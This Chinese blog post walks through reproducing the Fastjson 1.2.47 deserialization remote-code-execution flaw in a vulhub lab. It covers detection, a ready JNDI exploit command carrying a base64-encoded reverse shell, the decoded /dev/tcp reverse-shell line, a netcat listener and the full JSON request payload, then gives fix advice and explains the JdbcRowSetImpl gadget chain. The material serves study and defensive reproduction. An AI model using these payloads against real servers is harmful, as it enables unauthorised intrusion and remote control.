【漏洞库】Fastjson_1.2.47_rce

已于 2023-09-29 14:24:35 修改
阅读量890 收藏
点赞数 2
分类专栏: 漏洞库 文章标签: Fastjson反序列化漏洞 web渗透 漏洞复现 漏洞库 网络安全
于 2023-09-08 20:05:43 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46367450/article/details/132766760
版权

文章目录

漏洞描述

Fastjson是阿里巴巴公司开源的一款json解析器,其性能优越,被广泛应用于各大厂商的Java项目中。fastjson于1.2.24版本后增加了反序列化白名单,而在1.2.48以前的版本中,攻击者可以利用特殊构造的json字符串绕过白名单检测,成功执行任意命令。

漏洞编号

CNVD-2019-22238

漏洞评级

严重

影响版本

< Fastjson 1.2.47 及之前的版本

漏洞复现

- 利用工具

链接:https://pan.baidu.com/s/1KEl1Z9Z3hWXKtENLxSE1wg?pwd=yuan

- 漏洞环境

vulhub的靶场环境:vulhub/fastjson/1.2.47-rce](https://github.com/vulhub/vulhub/tree/master/fastjson/1.2.24-rce)

运行测试环境:

docker compose up -d

环境运行后,访问http://your-ip:8090即可看到JSON格式的输出:

image-20230908172805694

- 漏洞扫描

手工主动测试,利用非法json格式来尝试获取回显:

如图我们可以看到,服务端返回报错内容中包含fastjson。

- 漏洞验证

借助DNSLog,让目标服务器访问,查看回显

image-20230908172442160

发现有回显,说明存在漏洞

image-20230908172408509

- 深度利用

使用JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar 工具开启JNDI服务:

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC45Ljc1LjEwMS83Nzc3IDA+JjE=}|{base64,-d}|{bash,-i}" -A "10.9.75.101"

以下命令的解释:

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC45Ljc1LjEwMS83Nzc3IDA+JjE=}|{base64,-d}|{bash,-i}

这是一个在bash shell中执行的命令,它涉及到了bash、echo、base64和管道操作符。首先,{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC45Ljc1LjEwMS83Nzc3IDA+JjE=}部分将字符串YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC45Ljc1LjEwMS83Nzc3IDA+JjE=作为参数传给echo命令,然后输出。接着,输出被传递给base64 -d进行解码,最后解码的结果再传递给bash -i进行执行。其中,{bash,-i}部分表示使用交互模式运行bash

其中的base64编码是通过这个网站进行编码的:https://ares-x.com/tools/runtime-exec/

编码过程如图:

image-20230908173611333

执行开启服务的命令之后,如图所示,表示已经开启了不同java版本的rmi服务与ldap服务:

image-20230908173808090

- GetShell

kali开启监听:

nc -lvvp 7777

发送请求包:

POST / HTTP/1.1
Host: 10.9.75.101:8090
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/json
Content-Length: 261

{
    "a":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"ldap://10.9.75.101:1389/zbcmsg",
        "autoCommit":true
    }
}

image-20230908174059606

发送之后,可以看到kali已经获得反弹Shell

image-20230908174134695

- EXP 编写

这里直接使用JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar-C 参数指定EXP(这里的EXP使用反弹shell),不过这个EXP需要通过base64编码:

bash -i >& /dev/tcp/10.9.75.101/7777 0>&1

通过网站在线编码:

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC45Ljc1LjEwMS83Nzc3IDA+JjE=}|{base64,-d}|{bash,-i}

其中的base64编码是通过这个网站进行编码的:https://ares-x.com/tools/runtime-exec/

编码过程如图:

image-20230908173611333

将以上编码结果交给 -C参数,再使用 -A参数指定JNDI服务所处的服务器IP地址,执行jar包之后就会生成EXP并且将EXP放置JNDI服务中。

漏洞挖掘

- 寻找入口点

  1. 找到发送JSON序列化数据的接口

  2. 判断是否使用fastjson,利用非法json格式来尝试获取回显:

    如图我们可以看到,服务端返回报错内容中包含fastjson。

  3. 通过BP插件检测该fastjson版本是否存在漏洞

    https://github.com/zilong3033/fastjsonScan

    下载插件导入BP

    抓包发送到插件进行检测:

    在这里插入图片描述

如下检测结果:存在漏洞

image-20230908182543255

- 指纹信息

通过异常json输入之后的响应回显,判断是否使用fastjson

修复建议

- 漏洞修复

  1. 升级Fastjson到最新版

  2. 使用安全产品过滤非法内容

    比如请求包中如果出现了JdbcRowSetImpl,就可以把他拦住。

  3. 更换其它序列化工具 Jackson/Gson

漏洞原理

不同版本的fastjson其实就是对一些输入的数据进行了校验等操作,绕过校验之后底层的利用链还是一样的。以下是fastjson反序列化漏洞的本质:

  1. 由于将JSON数据进行反序列化的时候会自动调用方法中的 get/set/is方法。

  2. 所以如果有方法在自动调用get/set/is方法的时候能访问远程资源,那么就可以借助这个方法完成利用。

  3. 很巧的是,JDK8中恰好有个JdbcRowSetlmpl类,里面就有 set方法 setAutoCommit,这个方法里面调用了connect方法,connect方法里面又具有JNDI的lookup方法,lookup方法里面传的恰好又是get方法,所以我们可以编写一个payload,利用@type指定要序列化的类,然后指定一些要反序列化的属性,即可完成利用链,接下来就看利用链中的源码:

  4. 利用JdbcRowSetlmpl类中的方法setAutoCommit()

    image-20230716150420480

  5. 进入connect方法:

    image-20230716150603925

    我们可以看到connect方法中具有JNDI的lookup方法,lookup是JNDI用于查找资源的方法,里面传的参数是dataSourceName,所以我们可以在payload的json字符串中传入这个参数dataSourceName,并且指定他的 值为我们的RMI服务或者其他服务,lookup就会到我们指定的服务中下载恶意代码并执行。

    为什么下载我们的EXP后会自动执行呢?

    因为我们的exp具有静态代码块或者构造方法,当程序创建实例的时候,就会自动触发构造方法或者静态代码块的内容。

    如下图中的NamingManager类,其中利用反射创建实例,然后就直接触发恶意代码中的静态代码块内容,从而让我们利用。

    image-20230715133800679

yuan_boss
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Fastjson RCE漏洞利用与防护手段
不忘初心,护天下安全!
07-12 696
Fastjson是Alibaba开发的Java语言编写的高性能JSON,用于将数据在JSON和Java Object之间互相转换,提供两个主要接口JSON.toJSONString和JSON.parseObject/JSON.parse来分别实现序列化和反序列化操作。项目地址:https://link.zhihu.com/?target=https%3A//github.com/alibaba/fastjson随着该框架的使用,安全人员发现了一系列反序列化漏洞,每一次都是IT界的“地震”。漏洞合集见:Fa
fastjson_rce_tool:fastjson命令执行自动化利用工具,远程执行代码,JNDI服务利用工具RMILDAP
03-31
fastjson_rce_tool java -jar fastjson_tool.jar Usage: java -cp fastjson_tool.jar fastjson.HRMIServer 127.0.0.1 80 "curl dnslog.wyzxxz.cn" java -cp fastjson_tool.jar fastjson.HLDAPServer 127.0.0.1 80 ...
FastjsonRCE1.2.47漏洞复现
02-24 1272
Fastjson漏洞原理和RCE1.2.47漏洞复现
推荐文章:深入理解并探索Fastjson RCE漏洞复现项目
最新发布
gitblog_00028的博客
06-04 229
推荐文章:深入理解并探索Fastjson RCE漏洞复现项目 项目地址:https://gitcode.com/Lonely-night/fastjsonVul 1、项目介绍 在当今的软件开发环境中,JSON(JavaScript Object Notation)已经成为数据交换的主要格式。fastjson是一个由阿里巴巴开发的Java语言编写的高性能功能完备的JSON,广泛应用于各种Java应...
java执行脚本语言demo
Coder_android
11-11 1031
public class Test { /** * @param args * @throws IOException  */ public static void main(String[] args) throws IOException { // TODO Auto-generated method stub Process  process = Runtime.get
Fastjson靶场
王嘟嘟的博客
02-14 779
花了一点时间,搞了一个Fastjson的靶场,主要目的是为了测试payload,以及方便后来者做一些练习。
vulfocus fastjson打靶
qq_18811919的博客
01-10 325
vulfocus/fastjson-cnvd_2017_02833:latest打靶
fastjson_rce_tool-master.zip
05-14
本文将深入探讨Fastjson中的远程代码执行(RCE漏洞,并介绍“fastjson_rce_tool-master”这个工具的相关知识。 Fastjson RCE漏洞通常发生在Fastjson解析不安全的JSON字符串时,允许攻击者通过构造特定的输入,...
fastjson-1.2.47官方jar包下载
09-05
Fastjson1.2.47版本中,我们看到了这一优秀的持续优化和提升。 首先,让我们了解Fastjson的核心功能。它主要分为两个关键部分:序列化和反序列化。序列化是将Java对象转换为JSON字符串的过程,而反序列化则是...
fastjson-rce-exploit:利用fastjson远程执行代码漏洞
03-15
《深入解析Fastjson-RCE漏洞及其利用》 Fastjson,作为一个高效、强大的Java语言中用于处理JSON数据的,被广泛应用于各种系统和项目中。然而,任何软件都可能存在潜在的安全隐患,Fastjson也不例外。"fastjson-...
FASTJSON反序列化(靶场复现)
m0_66376444的博客
04-06 601
FASTJSON反序列化漏洞复现fastjson的各个版本payload虽有区别,但是漏洞利用是一样的
vulhub靶场训练-fastjson漏洞
m0_67284865的博客
08-16 268
(51条消息) 关于fastjson 漏洞原理分析_fastjson漏洞原理_life1024的博客-CSDN博客Fastjson 是一个Java ,可以将Java 对象转换为 JSON 格式,当然它也可以将]SON 字符申转换为Java 对象Fastjson 可以操作任何Java 对象,即使是一些预先存在的没有源码的对象。
Fastjson反序列化漏洞原理与漏洞复现(基于vulhub靶场)
人若无名,便可专心练剑
03-27 2672
Fastjson反序列化漏洞也是一个知名度比较高的Java反序列化漏洞,他是阿里巴巴的开源,下面我将主要带大家了解Fastjson反序列化漏洞的原理以及相关知识点的内容,然后带师傅们去利用rmi服务去复现这个Fastjson反序列化漏洞!!!
Fastjson反序列化漏洞(靶场搭建复现
hovcfuti的博客
10-10 768
首先,Fastjson提供了autotype功能,允许用户在反序列化数据中通过“@type”指定反序列化的类型,其次,Fastjson自定义的反序列化机制时会调用指定类中的setter方法及部分getter方法,那么当组件开启了autotype功能并且反序列化不可信数据时,攻击者可以构造数据,使目标应用的代码执行流程进入特定类的特定setter或者getter方法中,若指定类的指定方法中有可被恶意利用的逻辑(也就是通常所指的“Gadget”),则会造成一些严重的安全问题。
(一)vulhub专栏:FastJson1.2.24、1.2.27漏洞复现
云舒的博客
05-26 1587
入职大厂必会 写在前面的话:请注意本篇博客最后面的附(注意java版本),本篇博客采用的是LDAP服务getshell,rmi同理。阅读本篇博客需了解fastjson,ldap,rmi。 启动靶场 在终端里进入事先进入准备好的vulhub靶场目录下, cd fastjson/1.2.24-rce/ sudo docker-compose up -d 执行命令后,看到如下图所示即为成功,此时可在浏览器中输入http://ip:8090,正常访问即为靶场启动成功。 漏洞发现 漏洞成因 从 fastjson
Fastjson 总结
王嘟嘟的博客
02-12 1043
这一篇主要是针对已经完成的fastjson系列做一个知识点总结,一来是为了更加有条理的梳理已经存在的内容,二来是为了更好的复习和利用。
【网路安全---漏洞复现Fastjson 1.2.24 命令执行漏洞复现-JNDI简单实现反弹shell(CVE-2017-18349)
m0_67844671的博客
09-27 1724
fastjson是阿里巴巴的开源JSON解析,它可以解析JSON格式的字符串,支持将Java Bean序列化为JSON字符串,也可以从JSON字符串反序列化到JavaBean。即fastjson的主要功能就是将Java Bean序列化成JSON字符串,这样得到字符串之后就可以通过数据等方式进行持久化了。看了很多别人关于漏洞复现过程,很多博客过程简洁,有的过程过于复杂,比如看到写java代码,用javac进行编译等等。所以我想写出比较详细的漏洞复现过程。
网络安全深入学习第七课——热门框架漏洞RCEFastjson反序列化漏洞
p36273的博客
09-18 1677
json全称是JavaScript object notation。即JavaScript对象标记法,使用键值对进行信息的存储。"age":23,json本质就是一种字符串,用于信息的存储和交换。------ Fastjson 是一个阿里巴巴公司开源的 Java 语言编写的高性能功能完善的 JSON 。可以将Java 对象转换为 JSON 格式(序列化),当然它也可以将 JSON 字符串转换为 Java 对象(反序列化)。
fastjson-1.2.47下载
07-03
### 回答1: 要下载Fastjson-1.2.47,您可以按照以下步骤进行: 1. 打开您喜欢使用的浏览器,例如谷歌浏览器,火狐浏览器等。 2. 在搜索栏中输入"Fastjson-1.2.47下载",点击搜索按钮。 3. 在搜索结果中,您可能会找到许多网站提供的Fastjson-1.2.47的下载链接。选择一个您信任的官方网站,或者选择一些广受好评的下载站点。 4. 点击您选择的下载链接,进入Fastjson-1.2.47的下载页面。 5. 在下载页面上,您可能会看到一些说明和选项。根据您的需求,选择适当的选项,例如下载版本(如果有多个版本提供),下载平台等。 6. 点击"下载"按钮,开始下载Fastjson-1.2.47。 7. 下载完成后,找到下载的文件。通常情况下,它会保存在您的计算机的默认下载文件夹中。 8. 双击下载的文件,运行安装程序。按照提示完成安装过程。 9. 安装完成后,您现在可以使用Fastjson-1.2.47进行开发和其他操作了。 请注意,在任何时候下载软件时,要确保从可信的来源下载软件,并在安装之前使用杀毒软件进行扫描,以确保安全性。 ### 回答2: fastjson-1.2.47是一个用于Java编程语言的JSON(JavaScript Object Notation)解析器和生成器。它可以将Java对象转换为JSON格式的字符串,并将JSON字符串转换为对应的Java对象。要下载fastjson-1.2.47,您可以按照以下步骤进行操作: 1. 打开一个网页浏览器,进入fastjson的官方下载页面。 2. 在页面上找到fastjson-1.2.47的下载链接,并单击它。 3. 选择您希望将fastjson-1.2.47下载到的位置。这可以是您的计算机上的任何文件夹或目录。 4. 单击“下载”按钮开始下载fastjson-1.2.47。 5. 等待下载完成。下载速度取决于您的互联网连接速度和下载文件的大小。 6. 下载完成后,在您选择的目标位置找到下载的fastjson-1.2.47文件。 7. 可能需要解压缩fastjson-1.2.47文件(如果下载的是压缩包)。您可以使用解压缩软件(如WinRAR或7-Zip)来执行此操作。 8. 现在,您可以在您的Java项目中使用fastjson-1.2.47了。将fastjson的JAR文件添加到您的项目构建路径中,并根据fastjson的文档或示例代码来使用它。 通过按照上述步骤下载并使用fastjson-1.2.47,您将能够在您的Java项目中轻松地解析和生成JSON数据。 ### 回答3: 要下载fastjson-1.2.47,可以按照以下步骤进行操作: 1. 打开浏览器,进入fastjson的官方网站。 2. 在网站的顶部导航栏或页面中找到“下载”选项,并点击进入下载页面。 3. 在下载页面中,找到fastjson-1.2.47版本的下载链接,一般会以类似于“Download JSON-1.2.47”的形式呈现。 4. 点击下载链接,浏览器将开始下载fastjson-1.2.47的压缩包(通常为zip或tar.gz格式)。 5. 下载完成后,解压缩该压缩包到指定的目录中。 6. 接下来,可以根据需要将fastjson-1.2.47导入到项目中。可以使用IDE,如Eclipse或IntelliJ IDEA,在项目中创建一个新的,并将解压后的fastjson文件夹添加到该中;或者直接将fastjson的jar文件添加到项目的classpath中。 7. 确保正确导入fastjson后,即可开始使用fastjson-1.2.47进行JSON数据的处理和操作。 总结:要下载fastjson-1.2.47,首先访问fastjson的官方网站,找到下载页面并下载该版本的压缩包。然后解压缩,并将其导入到项目中,即可开始使用fastjson-1.2.47
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

yuan_boss

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值